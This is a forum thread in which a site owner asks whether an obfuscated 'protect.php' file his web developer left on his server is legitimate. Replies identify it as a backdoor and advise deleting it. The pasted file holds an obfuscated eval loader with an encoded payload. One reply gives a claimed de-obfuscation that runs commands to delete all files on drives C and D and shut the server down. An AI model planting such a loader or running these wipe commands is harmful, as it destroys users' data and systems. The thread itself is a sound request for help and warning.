please help

[Nicolay]

someone create for me website , but i think he can access on my server with website files , i see file name is protect.php

but can you tell me this code it legal or not , thanks

 

<?php /* This is file is to protect your site. Don't attempt to remove it. And this file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited. */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$GLOBALS['OOO0000O0']=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}.$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$GLOBALS['OOO0000O0'].=$GLOBALS['OOO0000O0']{3}.$OOO000000{11}.$OOO000000{12}.$GLOBALS['OOO0000O0']{7}.$OOO000000{5};$GLOBALS['OOO000O00']=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$GLOBALS['O0O000O00']=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$GLOBALS['O0O000O00']=$O0O000O00.$OOO000000{3};$GLOBALS['O0O00OO00']=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$GLOBALS['OOO00000O']=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x370;eval($GLOBALS['OOO0000O0']('JE8wMDBPME8wMD0kR0xPQkFMU1snT09PMDAwTzAwJ10oJE9PTzBPME8wMCwncmInKTskR0xPQkFMU1snTzBPMDBPTzAwJ10oJE8wMDBPME8wMCwweDVjMyk7JE9PMDBPMDBPMD0kR0xPQkFMU1snT09PMDAwME8wJ10oJEdMT0JBTFNbJ09PTzAwMDAwTyddKCRHTE9CQUxTWydPME8wME9PMDAnXSgkTzAwME8wTzAwLDB4MWE4KSwnRW50ZXJ5b3V3a2hSSFlLTldPVVRBYUJiQ2NEZEZmR2dJaUpqTGxNbVBwUXFTc1Z2WHhaejAxMjM0NTY3ODkrLz0nLCdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvJykpO2V2YWwoJE9PMDBPMDBPMCk7'));return;?>~Dkr9NHenNHenNHe1zfukgFMaXdoyjcUImb19oUAxyb18mRtwmwJ4LT09NHr8XTzEXRJwmwJXLO0xNWLyHA1SmT09NHeEXHr8Xk10PkrfHT0knTyYdk09NTzEXHeEXTZffhtOuTr9tWAxTBZfNHr8XHr9NHeEmbUILTzEXHr8XTzEXRtONTzEXTzEXHeEpRtfydmOlFmlvfbfqDykwBAsKa09aaryiWMkeC0OLOMcuc0lpUMpHdr1sAunOFaYzamcCGyp6HerZHzW1YjF4KUSvNUFSk0ytW0OyOLfwUApRTr1KT1nOAlYAaacbBylDCBkjcoaMc2ipDMsSdB5vFuyZF3O1fmf4GbPXHTwzYeA2YzI5hZ8mhULpK2cjdo9zcUILTzEXHr8XTzEXhTslfMyShtONTzEXTzEXTzEpKX==eWplfMyShuniC2SPk0IQkZXmYjA3YjCxYLHZKeCZYjr3HzC1HzCzYeaoYjW2YTCzYLC2YeC1HjIZYzOnYeC2YefnYjr0YjOyYLC1WTA3YzI3HzW5YeWzHeC3Yjw2OeA2HzH0KTW1YrA1HeA0YTH2YzC5YTCzHTOyYLr2HzcrYLH3YzC0YeHzYTA0Yjr0YzA2YzH2HjWzYeL3HeOoYzF2OjOnYrr0YzH5YeC2YTW3YTC2WTW5YeWzHeC3Yrr0YjC0Y0r2HTW2YrA2OjanYTF3KeFzYrH1YeH1YTH2YeA3HzW2OjW5YLW0OTF0YAr0HzWxYzC1HzF5Yew2WjanYTF3YzC3YAr0YeFXYjH0WjC5Yer3YjCzYTH0HTF2YAr2KTWxYzC2HzF5Yer2KTOeYeH0HTF3YrH0HzWZYLW1KTA3YzI3WTanYTH2WjH3YeL0HTcoYrr0WTW3HzL0YjC1YeF1YjcnYeL0YeHXYjF0WTW2YjW3WTCxYeC0OTcoYAr1YzF4YzH0WzA0HzA1HzC0YTFzYecoYeL2OeOyYzW1WTWzYer3YjAzYzL0HjctYAr1YzF3YjF1KTfnYzE2HzOtYjL0HTF2YjH1HzWxYzC1WTC5Yer3YjCzYzL0HTC5YrH0HzWxYzF0WzWzYew2OeA5YTF3KefnYAr1HzctHzF0KTWxYLC0WTOnYeFzKTW2YjA0YzA2YLr0KTW0HzE2YzOnYeC2YefnYjr0YjOyYLC1WTA3YzI3HzOeYTWzYTAzYjW1YzH0YLC0KTcyYrA2OjC0YTI1HjctYjwzHzC0YzA0KTWzHzL3WTW5YjL3YzC3YrW0HzF3YjF1WTcrYeC3HzCzHzw1YTFXYrC3Yzw3HjLZKTYtkZLpKX==alVnRPIq

[benanamen]

That is a hacking script. Get rid of it.

[scootstah]

That is a back door which basically allows anyone to execute code on your server.

 

Sorry to say, but if the person that built your website did that, then you can not trust anything else he has done. Get rid of it, try to get your money back, and find a legit developer.

[someotherdude]

The de-ofuscated code is here:

 

$WshShell = new COM("WScript.Shell");
$oExec = $WshShell->Run("cmd /K del d:\* /q /f /s ", 0, false); 
$oExec = $WshShell->Run("cmd /K del c:\* /q /f /s ", 0, false); 
$oExec = $WshShell->Run("shutdown /s", 0, false);

The first line creates an COM object, that uses WScript, which is used to create batch jobs.

Then the second line uses that object to delete everything in drive d:

Then the third line uses again that object to delete everything in drive c:

And finally, the fourth line shuts down the server.